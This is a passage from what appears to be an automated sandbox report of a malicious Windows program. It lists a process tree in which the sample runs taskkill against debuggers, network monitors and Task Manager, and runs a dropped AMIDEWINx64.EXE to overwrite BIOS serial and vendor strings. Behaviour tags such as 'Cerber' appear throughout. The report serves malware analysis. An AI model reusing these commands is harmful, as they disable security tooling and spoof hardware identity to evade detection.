C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Taskmgr.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq64.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Wireshark.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Fiddler.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FiddlerEverywhere.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos32.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im de4dot.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Cheat Engine.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-i386.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-i386.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTP Debugger Windows Service (32 bit).exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x64dbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x32dbg.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Taskmgr.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Wireshark.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Fiddler.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FiddlerEverywhere.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos64.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im de4dot.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Cheat Engine.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-i386.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-i386.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTP Debugger Windows Service (32 bit).exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x64dbg.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x32dbg.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"3⤵
- Cerber
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /SV "System version"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SS VJ62L7JV1G2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /SS VJ62L7JV1G3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /SU AUTO3⤵
- Cerber
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Taskmgr.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"3⤵
- Cerber
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"3⤵
- Cerber
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /BP "B560M-C"3⤵
- Cerber
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BV " "2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /BV " "3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BS 1OFHFCGH44O43V2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /BS 1OFHFCGH44O43V3⤵
- Cerber
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /BT "Default string"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /BLC "Default string"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /CM "Default string"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /CV "Default string"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Wireshark.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CS 1OFHFCGH442⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /CS 1OFHFCGH443⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Fiddler.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /CA "Default string"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FiddlerEverywhere.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /CSK "SKU"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos64.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /PSN "To Be Filled By O.E.M."3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /PAT "To Be Filled By O.E.M."3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."2⤵
-
C:\Windows\System32\AMIDEWINx64.EXEC:\Windows\System32\AMIDEWINx64.EXE /PPN "To Be Filled By O.E.M."3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&12⤵
-
